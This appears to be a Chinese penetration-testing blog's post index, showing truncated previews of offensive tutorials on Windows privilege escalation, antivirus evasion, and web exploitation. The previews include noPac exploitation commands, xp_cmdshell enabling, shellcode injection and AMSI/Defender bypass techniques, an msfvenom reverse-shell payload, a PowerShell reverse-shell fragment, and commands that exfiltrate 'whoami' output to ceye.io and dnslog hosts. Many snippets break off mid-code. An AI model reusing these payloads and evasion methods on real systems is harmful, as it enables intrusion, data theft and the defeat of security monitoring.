- 博客(171)
- 收藏
- 关注
RSS订阅原创 WEB渗透Win提权篇-AccountSpoofing
https://github.com/cube0x0/noPac>noPac.exe scan -domain htb.local -user user -pass 'password123'>noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt>noPac.exe -
2024-08-25 20:36:43
116
原创 WEB渗透Win提权篇-MSSQL
查询状态>select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 存在返回1EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;exec sp_configure 'xp_cmdshell',1;reconfigure;exec maste
2024-08-24 01:07:15
104
原创 WEB渗透Win提权篇-RDP&Firewall
放行出去到远程8888端口的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=out remoteport=8888 action=allow。放行远程8888端口进来的流量 netsh advfirewall firewall add rule name="88" protocol=TCP dir=in remoteport=8888 action=allow。本机开启3389远程连接的方法。注: 修改连接端口重启后生效。
2024-08-24 01:05:52
329
原创 WEB渗透免杀篇-绕过
在进程中分配空间(检索内存地址)。我们可以使用几个Win32 API执行这些步骤: OpenProcess() VirtualAllocEx() WriteProcessMemory() CreateRemoteThread() 正常情况下,我们将原始shellcode直接写入到内存中,但是如果AV /EDR检测到了Shellcode,它们肯定会发出警报 所以我们在二进制文件中使用可逆的方式把shellcode编码,再解码写入内存来规避防护。现在,我们将开始实现将为我们执行shellcode注入的C代码。
2024-08-22 21:07:34
548
原创 Windows-Server-2016/2019绕过WindowsDefender
该代码利用golang中的syscall包来调用NewLazyDLL 方法来加载Kernel32.dll,加载Kernel32.dll后,即可将其用于寻址和内存分配。由于代码存在许久,可能直接使用会被检测到,这里对其进行了修改,重命名所有变量,通过URL方式加载shellcode,为了绕过沙盒,添加了一些其他的参数,如果不存在参数则退出执行。Windows Server 2016和2019上的Microsoft Defender Antivirus自动将您注册为某些排除项,具体由您指定的服务器角色定义。
2024-08-22 21:00:32
384
原创 WEB渗透免杀篇-cshot远程shellcode
C_Shot是一种用C语言编写的攻击性安全工具,旨在通过HTTP / HTTPS下载远程shellcode二进制文件(.bin),注入并执行shellcode。1.shellcode注入其自己的进程 2.使用父进程欺骗将shellcode注入子进程 使用C_Shot之类的工具的好处是,我们要执行的恶意代码没有存储在二进制文件中,而是从远程位置检索,读入内存然后执行。对于本文中的所有示例,我将使用github托管shellcode。分阶段和无阶段的shellcode在使用欺骗父进程方法时都可以绕过av。
2024-08-21 14:00:16
243
原创 WEB渗透免杀篇-MSF免杀
msf生成图片格式>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f faw -o /root/1.png生成解决方案即可。#define _CRT_SECURE_NO_WARNINGS#include #include #include int main(void){ FILE* fp; size_t size;
2024-08-21 13:56:09
206
原创 WEB渗透免杀篇-Pezor免杀
使用inline_syscall内联注入shellcode,结合sgn,donut等项目,增加了一些反调试技巧。–h 这里测试下mimikatz,-sleep设置为2分钟,执行后需等两分钟 打包之前。
2024-08-20 16:59:47
219
原创 WEB渗透免杀篇-Golang免杀
参数解释: garble(混淆库): -tiny 删除额外信息 -literals 混淆文字 -seed=random base64编码的随机种子 go: -w 去掉调试信息,不能gdb调试了 -s 去掉符号表 -H windowsgui 隐藏执行窗口,不占用 cmd 终端。复制到aes-sc.go中的51行替换payload 运行aes-sc.go生成AES加密后的值。复制输出的值到go-sc.go中的73行替换payload 编译成exe可执行程序。
2024-08-20 16:57:32
688
1
原创 WEB渗透免杀篇-Bypass-AMSI
$stream = $client.GetStream()[byte[]]$bytes = 0..65535|%{0}$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserv
2024-08-19 18:23:31
251
原创 WEB渗透免杀篇-MSF+shellcode免杀
目前过火绒,不过360,可组合一下 Vs新建c++控制台程序 右键属性-》将MFC的使用选为在静态库中使用MFC 生成c格式shellcode粘贴进remote inject.cpp。生成的py文件使用py2exe编译执行 生成的cs文件使用csc.exe编译执行 生成的cpp文件使用vc6.0编译,去掉预编译头编译执行。正常执行结束进程msbuild会失去会话,以下保存bat执行 获得session后立刻迁移进程。生成项目 能成功上线,并开启calc进程。当前过不了火绒,360动态静态可过。
2024-08-16 11:57:35
394
原创 WEB渗透免杀篇-分块免杀
przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location)) 变为 magic="Syst"+"em"+".dll";[DllImport("kernel32.dll")] 变为 [DllImport("ke"+"rne"+"l32.dll")] #可绕过赛门铁克。因为我没加汇编指令,中间这里直接按任意键跳过即可,懂的可以在开头添加一些指令,例如xor,inc,dec,add,sub,mov,nop等。
2024-08-15 08:52:32
330
原创 WEB渗透免杀篇-Powershell免杀
再混淆一下函数和变量 绕过执行命令的拦截 使用cs的参数欺骗。Powershell行为检测bypass。对函数,参数,变量进行混淆。
2024-08-15 08:47:21
304
原创 WEB渗透免杀篇-Python源码免杀
粘贴shellcode到shellcode+py.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe。粘贴shellcode到shellcode+c.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe。会在目录下生成dist文件夹,exe文件就在里面。会在目录下生成dist文件夹,exe文件就在里面。
2024-08-14 14:26:34
400
原创 WEB渗透免杀篇-C#源码免杀
Payload粘贴到InstallUtil-Shellcode.cs中使用csc编译。生成payload MSF监听需设置自动迁移进程。生成payload MSF监听需设置自动迁移进程。生成payload MSF监听需设置自动迁移进程。MSF启动监听 Payload粘贴到位置。粘贴payload后编译加密。与上文xor加密类似。
2024-08-14 14:19:06
246
原创 WEB渗透-MySQL渗透破局
客户端必须启用LOCAL-INFILE 客户端支持非SSL连接 目标web存在adminer等可检查数据库连接的脚本。攻击机本地运行python构造假mysql服务,使用目标web连接,读取文件。使用“use mysql”命令,选择要使用的数据库,修改远程连接的基本信息,保存在mysql数据库中,因此使用mysql数据库。使用“mysql -uroot -proot”命令可以连接到本地的mysql服务。”命令刷新刚才修改的权限,使其生效。命令可以更改远程连接的设置。不登录直接执行sql。
2024-08-13 08:44:29
349
原创 WEB渗透-近源攻击合集
# 钓鱼网络## Hostapd```text>apt install hostapd dnsmasq>cd /etc/hostapd```创建无加密热点```text>vim open.conf ```修改以下内容```textInterface=wlan1Ssid=FreeWIFIDriver=nl80211Channel=1Hw_mode=g```修改dns配置```text>vim /etc/dnsmasq.conf``````tex
2024-08-12 14:26:24
1646
原创 WEB渗透Bypass篇-常规操作
01利用LD_PRELOAD环境变量 02利用ShellShock(CVE-2014-6271) 03利用Apache Mod CGI 04 PHP-FPM利用LD_PRELOAD环境变量(同1) 05攻击PHP-FPM监听端口 06 Json Serializer UAF 07具有特定析构函数UAF的PHP7 GC。或 替换php文件中的mail为error_log("a",1);phpinfo中搜索server api是cgi或者fastcgi 如果是cgi模式:上传如下htaccess。
2024-08-10 22:34:20
240
原创 WEB渗透Bypass篇-常规函数绕过
------------------------------------------------------------------------------------------------------------------------------------------------------------------
2024-08-09 22:35:33
358
原创 WEB渗透-未授权访问篇
solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等。J2EE应用服务器,默认端口7001 访问URL,直接打开后台页面。默认端口8161,默认账户密码admin/admin。Shipyard默认密码 admin/shipyard。开源数据库,默认端口5984,SSL端口6984。默认端口2181 获得服务器环境信息。
2024-08-09 22:32:10
318
原创 WEB渗透未授权访问篇-Redis
-rhost=目标IP --rport=6379 --lhost=本机IP --lport=本地端口 --rpath="在目标保存的路径" --rfile="在目标保存的文件" --lfile="本地文件" --auth=redis密码。Web目录写入木马 启动项 系统DLL劫持(目标重启或注销) 特定软件的DLL劫持 覆盖快捷方式 覆盖配置文件 覆盖sethc等文件。修改redis_lua.py里的 host 为目标 IP 执行返回正常,反弹shell。
2024-08-08 19:59:48
451
原创 WEB渗透Web突破篇-编辑器漏洞
影响版本: 较早版本 脆弱描述:通过自定义Type变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。攻击利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp 打开这个地址就可以上传任何类型的文件了,Shell上传到的默认位置是:XXXX。
2024-08-08 19:22:03
685
原创 Web-server日志分析命令
awk '$0 ~ /[error]/ && match($0, /(client: )(.*)(, server)/, arr) {print arr[2]}' /var/log/apache2/error.log | sort | uniq -c | sort -rn | awk -v OFS='\t' '{"host " $2 | getline ip; print $0, ip}'
2024-08-07 10:49:59
364
原创 WEB渗透Web突破篇-目录爆破
|工具名称||cansina||Cewl||dirsearch||dirsearch_bypass403||dirb||dirmap||dontgo403||feroxbuster||ffuf||gobuster||gau||gospider||ihoneyBakFileScan_Modify||jsluice||katana||spray||urlfounder||urlbrute||URLFinder||waybackurls||wfuzz|
2024-08-07 10:49:08
510
原创 WEB渗透Web突破篇-SQL注入进阶
greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值 id=1 and greatest(ascii(substr(database(),0,1)),64)=64。mid(version() from 1 for 1)相当于Mid(version(),1,1)%a 换行符,可结合注释符使用%23%0a,%2d%2d%0a。/ 1,user() //数字范围 1000-50540。相当于 union select 1,2,3,4,5。/、--[空格] ...
2024-08-06 12:53:27
590
原创 WEB渗透Web突破篇-命令执行
>curl http://0ox095.ceye.io/`whoami`>ping `whoami`.b182oj.ceye.io>ping %CD%.lfofz7.dnslog.cn &cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.ceye.io
2024-08-06 12:34:53
219
原创 WEB渗透Web突破篇-WAF绕过
上传php3,php4,phtml等**文件名后加::DATA∗∗ConTent−Disposition:form−data;name="filepath";filename="1.asp::DATA** ConTent-Disposition: form-data; name="filepath"; filename="1.asp::DATA∗∗ConTent−Disposition:form−data;name="filepath";filename="1.asp::DATA" ConTent-
2024-08-05 14:19:13
2390
原创 WEB渗透Web突破篇-PHP漏洞利用
php:5.2.17 5.4.45GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding:gzip,deflateAccept-Chars
2024-08-05 14:04:15
233
原创 WEB渗透Web突破篇-PHPMyAdmin利用
phpMyAdmin 2.xPOST /scripts/setup.php HTTP/1.1Host: ip:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application
2024-08-04 12:58:26
91
原创 WEB渗透Web突破篇-SSTI
${1+1}#{1+1}不包括代码执行// DNS Lookup${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}// JVM 系统属性查找 (ex: java.class.path)${"".getClass().forName("java.lang.System").getD
2024-08-04 12:32:42
172
原创 WEB渗透Web突破篇-Xpath注入
https://github.com/orf/xcathttps://github.com/feakk/xxxpwnhttps://github.com/aayla-secura/xxxpwn_smarthttps://github.com/micsoftvn/xpath-blind-explorerhttps://github.com/Harshal35/XMLCHOR
2024-08-03 20:33:48
107
原创 WEB渗透Web突破篇-SSRF
转码服务在线翻译获取超链接的标题等内容进行显示请求远程服务器资源的地方,图片加载与下载(通过URL地址加载或下载图片)图片、文章收藏功能对外发起网络请求的地方,网站采集、网页抓取的地方。头像 (远程加载头像)一切要你输入网址的地方和可以输入ip的地方。数据库内置功能(mongodb的copyDatabase函数)邮件系统文件处理在线处理工具从URL关键字中寻找:share、wap、url、link、src、source、target、u、3g、display、sourceURl、im
2024-08-03 20:32:29
1114
原创 WEB渗透Web突破篇-PHP文件包含下载读取
import itertoolsimport requestsimport sysprint('[+] Trying to win the race')f = {'file': open('shell.php', 'rb')}for _ in range(4096 * 4096): requests.post('http://target.com/index.php?c=index.php', f)print('[+] Bruteforcing the inclusion')fo
2024-08-02 14:14:12
338
网络安全之渗透测试20w字全套笔记
2024-08-25
蓝桥杯等程序设计竞赛专题挑战教程
2024-08-25
蓝桥杯LeeCode数据结构与算法资源
2024-08-25
全套免杀教程+免杀工具合集
2024-08-25
CTF线下赛AWD脚本合集
2024-08-25
渗透测试常用poc、工具集合
2024-01-06
护网面试题总结+安全工程师笔试问题
2024-01-06
网络安全零基础学习路线 v2024
2024-01-06
SRC技术文档汇总100套(2024最新版)
2024-01-06
CISP、NISP二级、CISE题库最新版(2024年1月更新)
2024-01-06
NISP一级题库,NISP二级题库,国家信息安全水平测试,网络安全证书(2024)
2024-01-06
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人